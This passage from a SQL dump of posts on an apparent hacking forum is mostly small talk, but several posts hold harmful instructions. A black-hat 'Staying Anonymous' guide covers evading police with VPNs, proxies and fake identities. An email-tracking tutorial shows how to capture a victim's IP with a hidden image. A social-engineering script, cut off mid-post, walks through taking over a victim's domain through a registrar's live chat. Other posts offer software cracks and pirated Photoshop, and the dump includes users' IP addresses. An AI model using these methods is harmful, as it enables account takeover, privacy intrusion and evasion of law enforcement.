'RE: Make Cool Logo in just 20 sec....[HOT]', '0', '82', 'iTzIpod', '1345558150', 'It is easy and free and all. But I don\'t like them. I prefer to make my own and all. But anyways, Nice release!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f3132ef0129976ab1427538a719ca0b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('553', '168', '514', '50', 'RE: :(', '0', '54', 'Sin Cara', '1345558460', '[quote=\'iTzIpod\' pid=\'514\' dateline=\'1345554042\'] What were you demoted from? :/ Sorry for your loss. But what are you planning to do now? [/quote] Hmmmmmmmm...... Just planning for my MS admission :) [hr] Admin please close this thread.. and sorry for inconvenience!!', '119.154.75.152', '2006600600', '1', '0', '54', '1345559138', '1', 'b014ec8300d68b4ea52364af8d716e2e', '0', '1345559138'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('554', '167', '494', '4', 'RE: iTzIpod is here (:', '0', '82', 'iTzIpod', '1345558818', '@Timmy, thanks for the welcome. But please call my Jacob :p Also @t3h jok3r, thanks for the welcome. Also, LOL why don\'t you got a PSN ID? :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bd8826148f0067301cc37fb3b60bedc1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('555', '171', '535', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1345559070', '[quote=\'t3h jok3r\' pid=\'535\' dateline=\'1345556286\'] I mostly like listening to Rap songs. Wait isn\'t rap and the hip hop the same thing. [/quote] People say it is. People say it isn\'t :/ :?:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9114ae5796407e2b0f296053e2b15016', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('556', '112', '530', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1345559088', '[quote=\'iTzIpod\' pid=\'530\' dateline=\'1345555945\'] May I have a copy of this eBook please? I am an Elite member (Upgraded). Thanks. =] [/quote] PPD ebooks pack is sent... check your pm now.', '119.154.75.152', '2006600600', '1', '0', '0', '0', '1', 'b2594c291f85561feb41facfcd768802', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('557', '162', '476', '7', 'RE: Applying for that swag award ;)', '0', '82', 'iTzIpod', '1345559185', 'Lol. Congratulations on the swag award. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e99edd267646f0688983b0dcd1de9712', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('558', '134', '538', '47', 'RE: Win $10 for referring people', '0', '82', 'iTzIpod', '1345559239', '[quote=\'spacefish36\' pid=\'538\' dateline=\'1345556658\'] [quote=\'iTzIpod\' pid=\'525\' dateline=\'1345555390\'] I will try my best to refer HQ and active people. =] This forum already does contain HQ and active people. [/quote] This site is active and building up everyday, hopefully this site gets popular and I believe we can only help T3h Jok3r make his website successful. [/quote] Yes we can. And we will. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a3719aad2030f5a037c93b77059fdc2a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('559', '141', '537', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '82', 'iTzIpod', '1345559339', '[quote=\'spacefish36\' pid=\'537\' dateline=\'1345556515\'] [quote=\'iTzIpod\' pid=\'532\' dateline=\'1345556144\'] Is it me or the Chrome Link doesn\'t work? [/quote] It works for me. [quote=\'Baws\' pid=\'426\' dateline=\'1345341766\'] [quote=\'t3h jok3r\' pid=\'420\' dateline=\'1345330757\'] [quote=\'Baws\' pid=\'409\' dateline=\'1345328738\'] Thanks for the share, I\'ll try this out. Alright I got about 40 points ATM, lol. What sites do you suggest using? I got 7 tabs right now, yahoo-msn-milliondollarhomepage-youtube-aol-ebay [/quote] Aren\'t those 6? [/quote] Watch out guys, we gotta smartass over here.:D Just kidding babe, what happened is um...I accidentally pressed 7 instead of 6...:shy: [/quote] Lol. [/quote] Oh alright. It works now. Before, it just said loading. And the URL Link was about:blank', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '94b7ee5f3bcbd69c223aba1e5717801b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('560', '138', '355', '35', 'RE: Make Cool Logo in just 20 sec....[HOT]', '0', '54', 'Sin Cara', '1345559377', 'You are Welcome Bro :) ;) :)', '119.154.75.152', '2006600600', '1', '0', '0', '0', '1', 'ce45a511818d083d982592a9d1e97e76', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('561', '59', '540', '42', 'RE: 13 year old visits jail for hacking', '0', '82', 'iTzIpod', '1345559517', '[quote=\'spacefish36\' pid=\'540\' dateline=\'1345556778\'] [quote=\'iTzIpod\' pid=\'522\' dateline=\'1345554867\'] OMG I remember that show. It was like the best :p OT: It is a program. And it is a good thing he stopped. [/quote] What program are you talking about? [/quote] Beyond Scared Straight is a program that tries to convince the kids not to do the wrong things. And tries to make them change the path they are walking in. I don\'t know how to explain it. But if you watch the show, then you would notice it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd53d2907f5915ad9126e09cfa7cc1116', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('562', '104', '442', '33', 'RE: Photoshop vs Gimp', '0', '82', 'iTzIpod', '1345559836', '[quote=\'unixmoon\' pid=\'442\' dateline=\'1345419493\'] Oh OK. So which version of photoshop should I use? [/quote] You can use whichever one you want. I can give you a download link of CS3 or CS4. I use Photoshop CS4. But Photoshop CS6 is the latest version which I don\'t have. I also don\'t have CS5 too.. Sorry. But still if you want, I will give you the download link to Adobe Photoshop CS3 or CS4.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b805caa1e85a44cebc60845c877cab7f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('563', '152', '489', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '54', 'Sin Cara', '1345559898', '[quote=\'iTzIpod\' pid=\'489\' dateline=\'1345520696\'] Here\'s a virus scan for you OP! [url=https://www.virustotal.com/file/866c980f6001ff281d90974977c24a209d058bb506fe542a3c6ec5b6b9946660/analysis/1345520468/] Virus Scan[/url] You\'re welcome. [/quote] Thanks dude for virus scan ;)', '119.154.75.152', '2006600600', '1', '0', '0', '0', '1', 'fe20aa1ea37cad5b1703a5b00c66e3e3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('564', '139', '536', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '54', 'Sin Cara', '1345559956', '[quote=\'iTzIpod\' pid=\'536\' dateline=\'1345556489\'] When I try to go on http://skype.hotspotshield.com/banner.php I get this message saying Temporarily Unavailable! :/ [/quote] Don\'t worry..... Just wait ;)', '119.154.75.152', '2006600600', '1', '0', '0', '0', '1', 'caa45c2dcb082a941cc6b83b1ab783f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('565', '16', '42', '11', 'RE: Is Hacking legal or illegal?', '0', '82', 'iTzIpod', '1345560022', 'Hacking is illegal.... I just lost my train of thought. I forgot what I was going to say.. Meh just in general, Hacking is illegal. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b128dfa111011ca2ab34aa177b7f5a56', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('566', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '82', 'iTzIpod', '1345560297', 'ROFL @Baws. OT: I didn\'t know that! :o Thanks for the warning.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3c6655d13503d7a2a2b295b00861a54f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('567', '160', '462', '9', 'RE: $$$Sh@recash Moneymaking$$$', '0', '53', 'sirchamp', '1345562585', 'Yeah I fixed it. Just copy the adf.ly url into the link box and press enter. Then it should work. It works for me. If it still doesnt work I\'ll just write the direct mediafire link.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '1cb18f5f9986b579ce130695f1e3e7a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('568', '173', '0', '14', '[TUT] Staying Anonymous', '0', '54', 'Sin Cara', '1345562972', '[size=x-large][b][color=#1E90FF]Guide to staying anonymous[/color] [/b][/size] [IMG]http://i46.tinypic.com/142czsx.png[/IMG] [color=#FFD700][size=medium][b]#1 Mind Set[/b][/size][/color] If your a black hat hacker like me, your #1 priority should be to stay anonymous. Now there are many ways of staying anonymous but making it your #1 priority should be your main choice, if it\'s not make it that way. [size=medium][color=#FFD700][b]VPN\'s[/b][/color][/size] VPN\'s are very resourceful when hacking, they can save you in an instant. VPN\'s are pretty much information encrypters. VPN stands for Virtual Private Network. List Of Free VPN\'s SecurityKIS http://www.securitykiss.com/sk/index.php Free VPN http://thefreevpn.com/ proXPN http://proxpn.com/ USA IP http://www.usaip.eu/en/free_vpn.php Open VPN http://openvpn.net/ Its Hidden http://itshidden.com/ Cyberghost http://cyberghostvpn.com/ --> Good for germany Hotspot Shield http://anchorfree.com/downloads/hotspot-shield/ VPN Tool http://www.vpntool.com/services.php --> good US Tor VPN https://torvpn.com/information.html [color=#FFD700][size=medium][b]Proxies[/b][/size][/color] Proxies are also very useful. Lot\'s of hackers use proxies. Using proxy websites it bypasses your isp, when you type into the proxy it automatically hides your IP Address being logged onto the website your on. Be aware proxies do not last forever. List of Proxies http://www.hidemyass.com/ http://newipnow.com/ http://proxy6.org/ http://www.proxeasy.com/webclient.aspx http://proxify.com/ http://unblocked.in/ http://www.safersurfing.net/ http://hidefromyou.com/ http://www.httpsurf.com/ [color=#FFA500][size=medium][b]Virtual Machines[/b][/size][/color] This a very safe way to hack. No one can fuck up your computer either if your using a VM. Virtual Machines are pretty much computers on your desktop. Its an emulation. Make sure your VM has a password on it as well. List of VM\'s VMWare - https://my.vmware.com/web/vmware/downloads Virtual Box - https://www.virtualbox.org/wiki/Downloads VMLite - http://www.vmlite.com/index.php?option=com_rokdownloads&view=folder&Itemid=153 [color=#FFA500][size=medium][b]Be Careful With Your DOX Info[/b][/size][/color] Once you\'ve started hacking it would be great if you didnt put your real information on anything anymore. You should make it very hard for someone to get information about you, make it hard for someone to DOX you. I suggest using the website down below. Fake Name Generator - http://www.fakenamegenerator.com/ It\'s a website that generates a whole profile of information from name, address, phone number, email address, company, country, and even occupation. It generates alot, so I suggest using that. [color=#FFD700][size=medium][b]Stay Safe[/b][/size][/color] These are a few methods to staying anonymous. Although these methods are powerful you can never be to sure, these methods are not 100% so don\'t get mad if you get caught. With the cops you have to make the right moves at the right time to not get caught so stay safe. [color=#FFA500]Credits to[/color] : [b]w0rm.exe[/b]', '119.154.75.152', '2006600600', '1', '0', '0', '0', '1', '5205fc4f131aec5807f877e0230a3716', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('569', '168', '507', '50', 'RE: :(', '0', '20', 'JakeUS', '1345569039', 'Thread closed.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'e8854b965537351cad7297bc5c49879c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('570', '161', '469', '3', 'RE: Congratz NXK', '0', '61', 'NXK', '1345576192', 'Thank you, And I do not plan on abusing my position. Make sure you follow rules and everything should be just fine :)', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '27b3a4fe18ecf3eb7877b7ca2b225540', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('571', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '2', 'Apathy', '1345582636', 'hit me up with this pack.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '2deec8cf199636eaf6b123e634a5c4bf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('572', '167', '554', '4', 'RE: iTzIpod is here (:', '0', '1', 't3h jok3r', '1345586993', '[quote=\'iTzIpod\' pid=\'554\' dateline=\'1345558818\'] @Timmy, thanks for the welcome. But please call my Jacob :p Also @t3h jok3r, thanks for the welcome. Also, LOL why don\'t you got a PSN ID? :/ [/quote] It\'s just I don\'t want to get hacked ;) I also don\'t get much time so play alone at the night. f', '41.174.15.250', '699273210', '1', '0', '0', '0', '1', '0b83fdaa9bd822affb025e2a9606e35d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('573', '161', '469', '3', 'RE: Congratz NXK', '0', '1', 't3h jok3r', '1345588189', 'Hopefully, you don\'t abuse them. So far you haven\'t and I believe this guy will once become an Admin.', '41.174.15.250', '699273210', '1', '0', '0', '0', '1', 'f364edbefed5c2670074963c78a71035', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('574', '151', '399', '24', 'RE: Windows 8/Ubuntu/Android Themes For XP, Vista, Win7 x32 & x64', '0', '61', 'NXK', '1345589085', 'Nice themes, I\'m going to use it', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '7b0df3c5c53265691cad494e40833f2f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('575', '161', '573', '3', 'RE: Congratz NXK', '0', '61', 'NXK', '1345589159', '[quote=\'t3h jok3r\' pid=\'573\' dateline=\'1345588189\'] Hopefully, you don\'t abuse them. So far you haven\'t and I believe this guy will once become an Admin. [/quote] I hope I can prove my loyalty to you. That day of becoming an admin is far away hopefully. I want to make sure I actually work for it and earn it.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '8ac843d2d24e9524370f51cf23d1546e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('576', '174', '0', '3', 'Coders Group Released', '0', '1', 't3h jok3r', '1345589672', 'A couple of days ago a new group was made on L33T Hacking called [b]Coders[/b]. I don\'t know why I didn\'t announce it and why I didn\'t allow people to set it as their default group. I guess I forgot about it, anyways you can now join the [b]Coders[/b] group via UserCP and if you are part of more than 1 group then you can view all the usergroups a member is part of on the their profile. Example of all usergroups http://l33thacking.com/member.php?action=profile&uid=61 The Leader of the Coders group is [i][b]HoverCatz[/b][/i] [b]Userbar[/b] [img]https://dl.dropbox.com/u/33062220/Coders.png[/img] [b]Description:[/b] The coders group is a group dedicated to the coding section, they help people learn also code programs and many other kinds of products.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '4ebf62d1c6ecb606579a2299e4015804', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('577', '59', '561', '42', 'RE: 13 year old visits jail for hacking', '0', '1', 't3h jok3r', '1345590490', '[quote=\'iTzIpod\' pid=\'561\' dateline=\'1345559517\'] [quote=\'spacefish36\' pid=\'540\' dateline=\'1345556778\'] [quote=\'iTzIpod\' pid=\'522\' dateline=\'1345554867\'] OMG I remember that show. It was like the best :p OT: It is a program. And it is a good thing he stopped. [/quote] What program are you talking about? [/quote] Beyond Scared Straight is a program that tries to convince the kids not to do the wrong things. And tries to make them change the path they are walking in. I don\'t know how to explain it. But if you watch the show, then you would notice it. [/quote] :roflol: My bad, I don\'t know what I was up to this morning, when you said it\'s a program I thought you said a computing program.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '4facb42010c907393a7c255b864f150c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('578', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '1', 't3h jok3r', '1345590605', 'No problem. Enjoy and Good Luck. There are still a lot of web secrets left to be exposed.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '99b77fc46452a59aa0735c9237c01706', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('579', '175', '0', '42', 'Is Apple really the most valuable company?', '0', '1', 't3h jok3r', '1345590755', 'Go to any tech aggregator right now and you’ll see headlines loudly proclaiming Apple to be the most valuable publicly traded company ever. The Cupertino-based giant’s stock today reached US$660.73, giving it a market capitalisation US$619.37-billion. That means it slunk past the US$618.89-billion capitalisation Microsoft hit in 1999, which many believe to be the previous record. That makes it the most valuable publicly listed company in history. Except it doesn’t. In today’s money, Microsoft’s 1999 valuation is actually worth US$850-billion. Then again, the Redmond-based giant’s market cap today is only around US$257-billion. Yes we’re still dealing with massive numbers, but it effectively means that the company has lost three-quarters of it market cap over the last 13 years. Read more: http://za.news.yahoo.com/apple-really-most-valuable-company-ever-195640282.html', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '1c086e935c4ce0d02f112ac32c8e7df5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('580', '174', '576', '3', 'RE: Coders Group Released', '0', '2', 'Apathy', '1345590892', 'Cool nice idea.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'f255243d7047e7cff76988c0f9035dfb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('581', '173', '568', '14', 'RE: [TUT] Staying Anonymous', '0', '1', 't3h jok3r', '1345591474', 'Nice Tutorial. Stickied currently in the VPNs section so people with anonymity concerns can check this thread out.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '7706112224cc1017a4c6ca5f157e5aae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('582', '139', '356', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '1', 't3h jok3r', '1345591864', 'Honestly, this tutorial was not made by virtualhacker. He just leeched it from Google and posted it on HF so I don\'t believe he should be given credits but thanks for providing credits even if they were wrong. This thing still works I believe and anyone with the unavailable error, just wait few minutes and keep on checking.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', 'ba94711efb82292d509726a32b8c6f0a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('583', '150', '398', '12', 'RE: [TuT] Easiest Way To Portfoward (For RAT\'s)', '0', '4', 'Triple H', '1345592065', 'The only thing I avoid is PortForwarding because it\'s a complicated process for me, but you made it soooo easy in this tutorial.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '47e034dc0a42eb78c4de7bada78c6baf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('584', '149', '396', '12', 'RE: How to crack your Internet Download Manager forever', '0', '4', 'Triple H', '1345592116', 'I would give this a try, would you recommend doing a backup before doing this?', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '55a20430a8311f4fceba2c78a30352da', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('585', '148', '395', '12', 'RE: [Tutorial]How to use Cookies and access Premium Accounts', '0', '10', 'swa4567', '1345592272', 'So basically it saves all cookies for logins on all the sites in the code via Browser?', '41.174.14.60', '699272764', '0', '0', '0', '0', '1', 'e04a3aece7e44a07e1751d078d0b4406', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('586', '176', '0', '12', '[Tut]How trace an email', '0', '10', 'swa4567', '1345592325', '[b]Step 1 :[/b] Open your mail service and open compose window,Set your Anonymous mail as To address, Set a Interesting Title because our method only works if he opens that mail,So it\'s up to you to decide Title. [b]Step 2: [/b] Open another tab and go to [url=www.spypig.com/]Spypig[/url] website. [b]Step 3 :[/b] Select one of the tracker images or upload one by yourself,I prefer the blank one to avoid detection,Fill out the information, [img]http://i.imgur.com/xwfwe.jpg[/img] [b]Step 4:[/b] After pressing Generate Button drag and drop that image to 1st tab which is ready to send to your slave mail,Send the mail (Please note that you must send that email within 1 minute since the Generate button is pressed). [img]http://i.imgur.com/MI8B8.jpg[/img] [b]Step 5: [/b] Wait for this email to get read by the slave,You\'ll receive the Victims IP as soon as slave open that Tracker mail. Step 6: Use IP checker sites to find out information about that IP you got So thereby you can get information about the source of email :pirate:. [b][i]PM me if you want further help or have doubts.[/i][/b] [b]Notes[/b] [list] [*]Sometime mail providers hide images inside the mail,If then this method can\'t be done. [*]Make sure received IP is not proxyfied. [/list]', '41.174.14.60', '699272764', '0', '0', '0', '0', '1', '79616b5c29830fd304b3d2ae7fc4b241', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('587', '177', '0', '12', '[tut]How to get the FBI login screen', '0', '10', 'swa4567', '1345592811', '[align=center]Found this tutorial in a notepad file stored in my computer and decided to share it. [color=#FFD700][b][size=large]Downloads[/size][/b][/color] [url=http://www.stardock.com/products/logonstudio/downloads.asp]Logon Studio[/url] [url=http://www.stardock.com/products/logonstudio/downloads.asp]FBI Files[/url] [url=http://www.wincustomize.com/explore/logonstudio_xp/9724/]WideScreen Computer FBI Files[/url] [size=large][color=#FFD700][b]Tutorial[/b][/color][/size] - Setup & run logon studio (Download above) - Click load on the side of the program - Select the FBI Logon screen (Download above) - Highlight it hit apply then restart your computer [size=large][color=#FFD700][b]Picture[/b][/color][/size] [img]http://i1209.photobucket.com/albums/cc390/Geneathon/FBI-access.jpg[/img] You Can Get A FBI Logo, Search It On Google [/align]', '41.174.14.60', '699272764', '0', '0', '10', '1345592829', '1', '9c23280a0c76218eb715e9edfb51bff2', '0', '1345592829'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('588', '178', '0', '16', 'Social Engineering Domain Companies', '0', '10', 'swa4567', '1345593910', '[b]Why SE Domain Companies?[/b] To take over the domain or use the domain and redirect it to your deface page OR redirect it to your website for more views or earn more by redirecting it to adf.ly or similar sites. [b]Notes[/b] - I will be using something@fuck.com as a fake email - I will be using godaddy as the domain company [b]Requirements[/b] [list] [*] Email that is being used on the website [*] Name of the victim [*] Email that the victim uses for Payments [*] Must have a live chat option [*] Fake email [/list] [b]Step 1[/b] Go on their live chat option and provide the real name of the victim and your FAKE email, if they ask for the details before chat. [b]Step 2[/b] When they ask how may they help you, say \"Hi, How are you?\" [b]Step 3[/b] Use the reason below or a similar reason and continue to step 4 [quote] I went to FAKE COUNTRY for a week for a vacation and when I came back from the holiday, I noticed that someone has hacked all my email accounts and I think my godaddy account has been compromised as well, because I\'m unable to login. I couldn\'t do a 